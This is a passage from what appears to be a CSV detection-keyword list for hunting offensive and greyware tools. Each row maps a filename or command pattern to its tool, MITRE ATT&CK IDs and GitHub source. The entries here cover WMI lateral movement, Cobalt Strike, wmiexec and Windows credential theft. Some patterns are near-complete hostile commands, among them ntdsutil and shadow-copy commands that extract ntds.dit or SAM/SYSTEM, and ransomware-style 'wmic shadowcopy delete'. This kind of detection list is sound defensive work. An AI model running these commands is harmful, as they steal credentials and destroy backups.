T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/bluscreenofjeff/Malleable-C2-Randomizer","1","1","N/A","10","10","421","96","2022-09-09T15:50:16Z","2017-05-31T15:44:43Z" +"*WLAN-Windows-Passwords-Discord-Exfiltration*","offensive_tool_keyword","WLAN-Windows-Passwords","Opens PowerShell hidden - grabs wlan passwords - saves as a cleartext in a variable and exfiltrates info via Discord Webhook.","T1056.005 - T1552.001 - T1119 - T1071.001","TA0004 - TA0006 - TA0010 - TA0040","N/A","N/A","Credential Access","https://github.com/hak5/omg-payloads/tree/master/payloads/library/credentials/WLAN-Windows-Passwords","1","0","N/A","10","6","544","213","2023-09-28T12:35:19Z","2021-09-08T20:33:18Z" +"*WldpBypass.cs*","offensive_tool_keyword","CheeseTools","tools for Lateral Movement/Code Execution","T1021.006 - T1059.003 - T1105","TA0008 - TA0002","N/A","N/A","Lateral Movement - Sniffing & Spoofing","https://github.com/klezVirus/CheeseTools","1","1","N/A","10","7","653","138","2021-08-17T20:22:56Z","2020-08-24T01:28:12Z" +"*wl-lic -d *.dat -r *.rsa*","offensive_tool_keyword","whatlicense","WinLicense key extraction via Intel PIN","T1056 - T1056.001 - T1518 - T1518.001","TA0005 - TA0006","N/A","N/A","Exploitation tools","https://github.com/charlesnathansmith/whatlicense","1","0","N/A","6","1","61","5","2023-07-23T03:10:44Z","2023-07-10T11:57:44Z" +"*wl-lic -h HWID -m main_hash -d regkey2.dat -r regkey2.rsa*","offensive_tool_keyword","whatlicense","WinLicense key extraction via Intel PIN","T1056 - T1056.001 - T1518 - T1518.001","TA0005 - TA0006","N/A","N/A","Exploitation tools","https://github.com/charlesnathansmith/whatlicense","1","0","N/A","6","1","61","5","2023-07-23T03:10:44Z","2023-07-10T11:57:44Z" +"*wmap_crawler.rb*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*wmeye.csproj*","offensive_tool_keyword","WMEye","WMEye is a post exploitation tool that uses WMI Event Filter and MSBuild Execution for lateral movement","T1210 - T1570","TA0001 - TA0002 - TA0003 - TA0004 - TA0009","N/A","N/A","POST Exploitation tools","https://github.com/pwn1sher/WMEye","1","1","N/A","N/A","4","334","54","2021-12-24T05:38:50Z","2021-09-07T08:18:30Z" +"*wmeye.exe *","offensive_tool_keyword","WMEye","WMEye is a post exploitation tool that uses WMI Event Filter and MSBuild Execution for lateral movement","T1210 - T1570","TA0001 - TA0002 - TA0003 - TA0004 - TA0009","N/A","N/A","POST Exploitation tools","https://github.com/pwn1sher/WMEye","1","0","N/A","N/A","4","334","54","2021-12-24T05:38:50Z","2021-09-07T08:18:30Z" +"*wmeye.sln*","offensive_tool_keyword","WMEye","WMEye is a post exploitation tool that uses WMI Event Filter and MSBuild Execution for lateral movement","T1210 - T1570","TA0001 - TA0002 - TA0003 - TA0004 - TA0009","N/A","N/A","POST Exploitation tools","https://github.com/pwn1sher/WMEye","1","1","N/A","N/A","4","334","54","2021-12-24T05:38:50Z","2021-09-07T08:18:30Z" +"*Wmi_Persistence.ps1*","offensive_tool_keyword","cobaltstrike","A CobaltStrike script that uses various WinAPIs to maintain permissions. including API setting system services. setting scheduled tasks. managing users. etc.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/yanghaoi/CobaltStrike_CNA","1","1","N/A","10","10","403","78","2022-01-18T12:47:55Z","2021-04-21T13:10:11Z" +"*wmi_persistence.rb*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*wmic /* /user:administrator process call create *cmd.exe /c *","greyware_tool_keyword","wmic","Lateral Movement with wmic","T1078 - T1028 - T1106 - T1105","TA0002 - TA0004","N/A","N/A","Reconnaissance","https://github.com/RoseSecurity/Red-Teaming-TTPs/blob/main/Anti-Forensics.md","1","0","N/A","N/A","9","890","121","2023-10-03T19:54:40Z","2021-08-16T17:34:25Z" +"*wmic process call create*ntdsutil *ac i ntds* ifm*create full*","greyware_tool_keyword","wmic","The actor has executed WMIC commands [T1047] to create a copy of the ntds.dit file and SYSTEM registry hive using ntdsutil.exe","T1047 - T1005 - T1567.001","TA0002 - TA0003 - TA0007","N/A","Volt Typhoon","Credential Access","https://media.defense.gov/2023/May/24/2003229517/-1/-1/0/CSA_Living_off_the_Land.PDF","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*wmic SHADOWCOPY /nointeractive*","greyware_tool_keyword","wmic","VSS is a feature in Windows that allows for the creation of snapshots of a volume capturing its state at a specific point in time. Adversaries may abuse the wmic shadowcopy command to interact with these shadow copies for defense evasion purposes.","T1490 - T1562.002","TA0040 - TA0007","N/A","N/A","Defense Evasion","N/A","1","0","greyware tool - risks of False positive !","N/A","N/A","N/A","N/A","N/A","N/A" +"*wmic shadowcopy call create Volume='C:\'*","offensive_tool_keyword","AD exploitation cheat sheet","Dumping secrets from a Volume Shadow Copy We can also create a Volume Shadow Copy of the SAM and SYSTEM files (which are always locked on the current system) so we can still copy them over to our local system. An elevated prompt is required for this.","T1110","TA0006","N/A","N/A","Credential Access","https://casvancooten.com/posts/2020/11/windows-active-directory-exploitation-cheat-sheet-and-command-reference","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*wmic useraccount get /ALL /format:csv*","greyware_tool_keyword","wmic","User Enumeration","T1087 - T1033","TA0006","N/A","N/A","Reconnaissance","https://github.com/RoseSecurity/Red-Teaming-TTPs/blob/main/Anti-Forensics.md","1","0","N/A","N/A","9","890","121","2023-10-03T19:54:40Z","2021-08-16T17:34:25Z" +"*wmic*/Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName*","greyware_tool_keyword","wmic","list AV products with wmic","T1518.001 - T1082","TA0007 - TA0005","N/A","N/A","Discovery","N/A","1","0","N/A","2","9","N/A","N/A","N/A","N/A" +"*wmic.exe process call create *.txt:*.exe*","greyware_tool_keyword","wmic","Execute a .EXE file stored as an Alternate Data Stream (ADS)","T1105 - T1027.001 - T1096 - T1036","TA0002 - TA0008","N/A","N/A","Defense Evasion","https://github.com/RoseSecurity/Red-Teaming-TTPs/blob/main/Anti-Forensics.md","1","0","N/A","N/A","9","890","121","2023-10-03T19:54:40Z","2021-08-16T17:34:25Z" +"*wmic.exe* Shadowcopy Delete*","offensive_tool_keyword","blackcat ransomware","BlackCat Ransomware behavior","T1486.001 - T1489 - T1490 - T1486","TA0011 - TA0010 - TA0012 - TA0007 - TA0040","blackcat ransomware","N/A","Ransomware","https://www.sentinelone.com/labs/blackcat-ransomware-highly-configurable-rust-driven-raas-on-the-prowl-for-victims/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" +"*wmic/wmic.cmd*","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","1","N/A","10","10","199","62","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z" +"*WMIcmd*","offensive_tool_keyword","WMIcmd","This tool allows us to execute commands via WMI and get information not otherwise available via this channel.","T1059.001 - T1021 - T1210.001","TA0002 - TA0007 - TA0008","N/A","N/A","POST Exploitation tools","https://github.com/nccgroup/WMIcmd","1","1","N/A","N/A","4","324","85","2017-06-24T18:37:16Z","2017-05-17T06:50:12Z" +"*WMICStager*","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","1","N/A","10","10","199","62","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z" +"*wmi-event-lateral-movement.*","offensive_tool_keyword","cobaltstrike","LiquidSnake is a tool that allows operators to perform fileless lateral movement using WMI Event Subscriptions and GadgetToJScript","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/RiccardoAncarani/LiquidSnake","1","1","N/A","10","10","306","47","2021-09-01T11:53:30Z","2021-08-31T12:23:01Z" +"*WMI-EventSub.cpp*","offensive_tool_keyword","cobaltstrike","Collection of beacon BOF written to learn windows and cobaltstrike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Yaxser/CobaltStrike-BOF","1","1","N/A","10","10","297","54","2023-02-24T13:12:14Z","2020-10-08T01:12:41Z" +"*wmiexec *.exe*","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003","N/A","N/A","C2","https://bruteratel.com/","1","0","N/A","10","10","N/A","N/A","N/A","N/A" +"*WMIExec.git*","offensive_tool_keyword","wmiexec","Set of python scripts which perform different ways of command execution via WMI protocol","T1047 - T1059 - T1070 - T1036","TA0002 - TA0008","N/A","N/A","Exploitation Tools","https://github.com/WKL-Sec/wmiexec","1","1","N/A","N/A","2","146","21","2023-06-29T03:30:09Z","2023-06-21T13:15:04Z" +"*wmiexec.py -*","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*wmiexec_scheduledjob.py*","offensive_tool_keyword","wmiexec","Set of python scripts which perform different ways of command execution via WMI protocol","T1047 - T1059 - T1070 - T1036","TA0002 - TA0008","N/A","N/A","Exploitation Tools","https://github.com/WKL-Sec/wmiexec","1","1","N/A","N/A","2","146","21","2023-06-29T03:30:09Z","2023-06-21T13:15:04Z" +"*wmiexec_win32process.py*","offensive_tool_keyword","wmiexec","Set of python scripts which perform different ways of command execution via WMI protocol","T1047 - T1059 - T1070 - T1036","TA0002 - TA0008","N/A","N/A","Exploitation Tools","https://github.com/WKL-Sec/wmiexec","1","1","N/A","N/A","2","146","21","2023-06-29T03:30:09Z","2023-06-21T13:15:04Z" +"*wmiexec2.0.py*","offensive_tool_keyword","wmiexec2","wmiexec2.0 is the same wmiexec that everyone knows and loves (debatable). This 2.0 version is obfuscated to avoid well known signatures from various AV engines.","T1047 - T1027 - T1059","TA0005 - TA0002","N/A","N/A","Lateral Movement","https://github.com/ice-wzl/wmiexec2","1","1","N/A","9","1","10","1","2023-05-14T19:44:26Z","2023-02-07T22:10:08Z" +"*wmiexec2.py*","offensive_tool_keyword","wmiexec2","wmiexec2.0 is the same wmiexec that everyone knows and loves (debatable). This 2.0 version is obfuscated to avoid well known signatures from various AV engines.","T1047 - T1027 - T1059","TA0005 - TA0002","N/A","N/A","Lateral Movement","https://github.com/ice-wzl/wmiexec2","1","1","N/A","9","1","10","1","2023-05-14T19:44:26Z","2023-02-07T22:10:08Z" +"*wmiexec2-main*","offensive_tool_keyword","wmiexec2","wmiexec2.0 is the same wmiexec that everyone knows and loves (debatable). This 2.0 version is obfuscated to avoid well known signatures from various AV engines.","T1047 - T1027 - T1059","TA0005 - TA0002","N/A","N/A","Lateral Movement","https://github.com/ice-wzl/wmiexec2","1","1","N/A","9","1","10","1","2023-05-14T19:44:26Z","2023-02-07T22:10:08Z" +"*WMIExecHash.*","offensive_tool_keyword","silenttrinity","SILENTTRINITY is modern. asynchronous. multiplayer & multiserver C2/post-exploitation framework powered by Python 3 and .NETs DLR. Its the culmination of an extensive amount of research into using embedded third-party .NET scripting languages to dynamically call .NET APIs. a technique the author coined as BYOI (Bring Your Own Interpreter). The aim of this tool and the BYOI concept is to shift the paradigm back to PowerShell style like attacks (as it offers much more flexibility over traditional C# tradecraft) only without using PowerShell in anyway.","T1043 - T1071 - T1059 - T1070 - T1570 - T1547 - T1548 - T1027 - T1562 - T1018","TA0002 - TA0008 - TA0003 - TA0004 - TA0005 - TA0007 ","N/A","N/A","POST Exploitation tools","https://github.com/byt3bl33d3r/SILENTTRINITY","1","1","N/A","N/A","10","2070","413","2023-07-08T19:10:18Z","2018-09-25T15:17:30Z" +"*WMIExecHash.boo","offensive_tool_keyword","silenttrinity","SILENTTRINITY is modern. asynchronous. multiplayer & multiserver C2/post-exploitation framework powered by Python 3 and .NETs DLR. Its the culmination of an extensive amount of research into using embedded third-party .NET scripting languages to dynamically call .NET APIs. a technique the author coined as BYOI (Bring Your Own Interpreter). The aim of this tool and the BYOI concept is to shift the paradigm back to PowerShell style like attacks (as it offers much more flexibility over traditional C# tradecraft) only without using PowerShell in anyway.","T1043 - T1071 - T1059 - T1070 - T1570 - T1547 - T1548 - T1027 - T1562 - T1018","TA0002 - TA0008 - TA0003 - TA0004 - TA0005 - TA0007 ","N/A","N/A","POST Exploitation tools","https://github.com/byt3bl33d3r/SILENTTRINITY","1","1","N/A","N/A","10","2070","413","2023-07-08T19:10:18Z","2018-09-25T15:17:30Z" +"*WMIExec-main*","offensive_tool_keyword","wmiexec","Set of python scripts which perform different ways of command execution via WMI protocol","T1047 - T1059 - T1070 - T1036","TA0002 - TA0008","N/A","N/A","Exploitation Tools","https://github.com/WKL-Sec/wmiexec","1","1","N/A","N/A","2","146","21","2023-06-29T03:30:09Z","2023-06-21T13:15:04Z" +"*wmiexec-Pro.git*","offensive_tool_keyword","wmiexec-pro","The new generation of wmiexec.py with new features whole the operations only work with port 135 (don't need smb connection) for AV evasion in lateral movement","T1021.006 - T1560.001","TA0008 - TA0040","N/A","N/A","Network Exploitation tools","https://github.com/XiaoliChan/wmiexec-Pro","1","1","N/A","N/A","8","790","98","2023-07-31T03:58:14Z","2023-04-04T06:24:07Z" +"*wmiexec-pro.py*","offensive_tool_keyword","wmiexec-pro","The new generation of wmiexec.py with new features whole the operations only work with port 135 (don't need smb connection) for AV evasion in lateral movement","T1021.006 - T1560.001","TA0008 - TA0040","N/A","N/A","Network Exploitation tools","https://github.com/XiaoliChan/wmiexec-Pro","1","1","N/A","N/A","8","790","98","2023-07-31T03:58:14Z","2023-04-04T06:24:07Z" +"*wmi-lateral-movement.*","offensive_tool_keyword","cobaltstrike","LiquidSnake is a tool that allows operators to perform fileless lateral movement using WMI Event Subscriptions and GadgetToJScript","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/RiccardoAncarani/LiquidSnake","1","1","N/A","10","10","306","47","2021-09-01T11:53:30Z","2021-08-31T12:23:01Z" +"*WMImplant*","offensive_tool_keyword","WMImplant","WMImplant is a PowerShell based tool that leverages WMI to both perform actions against targeted machines. but also as the C2 channel for issuing commands and receiving results. WMImplant will likely require local administrator permissions on the targeted machine.","T1021 - T1059 - T1047 - T1057 - T1049","TA0002 - TA0003 - TA0008 - TA0009 - TA0011","N/A","N/A","POST Exploitation tools","https://github.com/FortyNorthSecurity/WMImplant","1","1","N/A","N/A","8","767","152","2018-10-28T19:28:37Z","2016-05-24T14:00:14Z" +"*WMIPersist.*","offensive_tool_keyword","WMIPersistence","An example of how to perform WMI Event Subscription persistence using C#","T1547.008 - T1084 - T1053 - T1059.003","TA0003 - TA0004 - TA0002","N/A","N/A","Persistence","https://github.com/mdsecactivebreach/WMIPersistence","1","1","N/A","N/A","2","112","34","2019-05-29T09:48:46Z","2019-05-29T09:40:01Z" +"*wmipersist.py*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"*wmipersistence.py*","offensive_tool_keyword","silenttrinity","SILENTTRINITY is modern. asynchronous. multiplayer & multiserver C2/post-exploitation framework powered by Python 3 and .NETs DLR. Its the culmination of an extensive amount of research into using embedded third-party .NET scripting languages to dynamically call .NET APIs. a technique the author coined as BYOI (Bring Your Own Interpreter). The aim of this tool and the BYOI concept is to shift the paradigm back to PowerShell style like attacks (as it offers much more flexibility over traditional C# tradecraft) only without using PowerShell in anyway.","T1043 - T1071 - T1059 - T1070 - T1570 - T1547 - T1548 - T1027 - T1562 - T1018","TA0002 - TA0008 - TA0003 - TA0004 - TA0005 - TA0007 ","N/A","N/A","POST Exploitation tools","https://github.com/byt3bl33d3r/SILENTTRINITY","1","1","N/A","N/A","10","2070","413","2023-07-08T19:10:18Z","2018-09-25T15:17:30Z" +"*WMIPersistence.vbs*","offensive_tool_keyword","phishing-HTML-linter","Phishing and Social-Engineering related scripts","T1566.001 - T1056.001","TA0040 - TA0001","N/A","N/A","Phishing","https://github.com/mgeeky/Penetration-Testing-Tools/blob/master/phishing","1","1","N/A","10","10","2282","458","2023-06-27T19:16:49Z","2018-02-02T21:24:03Z" +"*WMIPersistImplant*","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","1","N/A","10","10","199","62","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z" +"*WMI-ProcessCreate.cpp*","offensive_tool_keyword","cobaltstrike","Collection of beacon BOF written to learn windows and cobaltstrike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Yaxser/CobaltStrike-BOF","1","1","N/A","10","10","297","54","2023-02-24T13:12:14Z","2020-10-08T01:12:41Z" +"*WMIReg.exe*","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1076 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","Exploitation tools","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","1887","285","2023-09-23T03:34:27Z","2020-06-05T12:50:00Z" +"*wmispawn select*","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003","N/A","N/A","C2","https://bruteratel.com/","1","0","N/A","10","10","N/A","N/A","N/A","N/A" +"*WmiSploit.git*","offensive_tool_keyword","Wmisploit","WmiSploit is a small set of PowerShell scripts that leverage the WMI service for post-exploitation use.","T1087 - T1059.001 - T1047","TA0003 - TA0002 - TA0008","N/A","N/A","POST Exploitation tools","https://github.com/secabstraction/WmiSploit","1","1","N/A","N/A","2","163","39","2015-08-28T23:56:00Z","2015-03-15T03:30:02Z" +"*WmiSploit-master/zip*","offensive_tool_keyword","Wmisploit","WmiSploit is a small set of PowerShell scripts that leverage the WMI service for post-exploitation use.","T1087 - T1059.001 - T1047","TA0003 - TA0002 - TA0008","N/A","N/A","POST Exploitation tools","https://github.com/secabstraction/WmiSploit","1","1","N/A","N/A","2","163","39","2015-08-28T23:56:00Z","2015-03-15T03:30:02Z" +"*WNFarmDynamite_h.cs*","offensive_tool_keyword","WindfarmDynamite","WindfarmDynamite is a proof-of-concept for code injection using the Windows Notification Facility (WNF). Of interest here is that this avoids suspect thread orchestration APIs (like CreateRemoteThread)","T1055.013 - T1546.008","TA0005 - TA0004","N/A","N/A","Exploitation tools","https://github.com/FuzzySecurity/Sharp-Suite/tree/master/WindfarmDynamite","1","1","N/A","N/A","10","1070","209","2022-12-22T23:57:19Z","2018-12-10T00:08:37Z" +"*word_gen_b_varlen.*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password 